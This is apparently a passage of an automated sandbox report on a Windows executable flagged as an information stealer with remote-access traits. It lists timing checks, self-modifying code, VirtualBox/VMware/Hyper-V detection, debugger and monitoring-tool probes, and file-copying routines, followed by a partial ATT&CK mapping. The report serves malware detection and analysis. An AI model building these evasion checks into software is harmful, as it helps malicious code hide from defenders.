                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2867 second address: 5C2886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F24EE2702h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6A9F second address: 5C6AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6AA3 second address: 5C6AB1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3F24EE26F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6AB1 second address: 5C6AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6AB5 second address: 5C6ACA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE26FBh 0x00000007 jnl 00007F3F24EE26F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6C1D second address: 5C6C39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40E3h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6D7B second address: 5C6D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3F24EE2700h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD6D7 second address: 5CD6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40E4h 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD6F0 second address: 5CD719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3F24EE26FFh 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jng 00007F3F24EE26FCh 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD719 second address: 5CD71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDCEC second address: 5CDCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDCF2 second address: 5CDCF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDCF6 second address: 5CDCFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDFA7 second address: 5CDFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jc 00007F3F244F40DEh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jne 00007F3F244F40D6h 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE58A second address: 5CE58E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE58E second address: 5CE5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F3F244F40D6h 0x0000000e jnp 00007F3F244F40D6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEBAA second address: 5CEBC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2704h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEBC4 second address: 5CEBCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEBCA second address: 5CEBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEE6E second address: 5CEE7D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3F244F40D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEE7D second address: 5CEE8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F3F24EE26F6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEE8D second address: 5CEE91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEE91 second address: 5CEEA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F3F24EE26F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEEA2 second address: 5CEEBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40E4h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEEBB second address: 5CEEC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jl 00007F3F24EE2702h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEEC9 second address: 5CEECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D37D5 second address: 5D37D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65B5 second address: 5D65C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40DCh 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65C6 second address: 5D65CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65CC second address: 5D65D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65D0 second address: 5D65D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65D4 second address: 5D65EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3F244F40DDh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D68BD second address: 5D68D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F24EE2700h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D68D8 second address: 5D68F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3F244F40E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D68F6 second address: 5D6911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F3F24EE2705h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6911 second address: 5D693C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F3F244F40DFh 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D693C second address: 5D6944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6944 second address: 5D694C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D694C second address: 5D6952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6952 second address: 5D6961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007F3F244F40DEh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD08F second address: 5DD099 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3F24EE26F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD099 second address: 5DD0D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F3F244F40DAh 0x00000011 push edx 0x00000012 pop edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push ecx 0x00000016 ja 00007F3F244F40D6h 0x0000001c jmp 00007F3F244F40E1h 0x00000021 pop ecx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD275 second address: 5DD27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD27B second address: 5DD27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD27F second address: 5DD283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD5D3 second address: 5DD5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD727 second address: 5DD72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD882 second address: 5DD886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD886 second address: 5DD89C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F3F24EE26F6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD89C second address: 5DD8A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD8A0 second address: 5DD8BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3F24EE2701h 0x0000000d jns 00007F3F24EE26F6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD8BF second address: 5DD8EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F3F244F40E0h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F3F244F40E1h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDBD8 second address: 5DDBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F3F24EE2704h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDBFB second address: 5DDC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDC03 second address: 5DDC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3F24EE2700h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDC18 second address: 5DDC35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F3F244F40E0h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7604 second address: 5E7610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3F24EE26F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7610 second address: 5E762F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F3F244F40E3h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E762F second address: 5E7638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7638 second address: 5E763E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 3C17D2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 58E55F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5ECEE7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_001738B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00174910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00174910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0016DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0016E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0016ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00174570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00174570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0016DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0016BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0016F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00173EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00173EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001616D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00161160 GetSystemInfo,ExitProcess | 0_2_00161160
                Source: file.exe, file.exe, 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2156506568.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWX
                Source: file.exe, 00000000.00000002.2156506568.0000000000D24000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwareq
                Source: file.exe, 00000000.00000002.2156506568.0000000000D24000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW*x
                Source: file.exe, 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13589
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13586
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13608
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13600
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13640
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging
                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001645C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_001645C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00179860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00179860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00179750 mov eax, dword ptr fs:[00000030h] | 0_2_00179750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00177850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00177850
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion
                Source: Yara match | File source: Process Memory Space: file.exe PID: 1824, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00179600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00179600
                Source: file.exe, file.exe, 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: VProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00177B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00176920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_00176920
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00177850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00177850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00177A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00177A30

                Stealing of Sensitive Information
                Source: Yara match | File source: 0.2.file.exe.160000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2111080022.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 1824, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality
                Source: Yara match | File source: 0.2.file.exe.160000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2111080022.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 1824, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
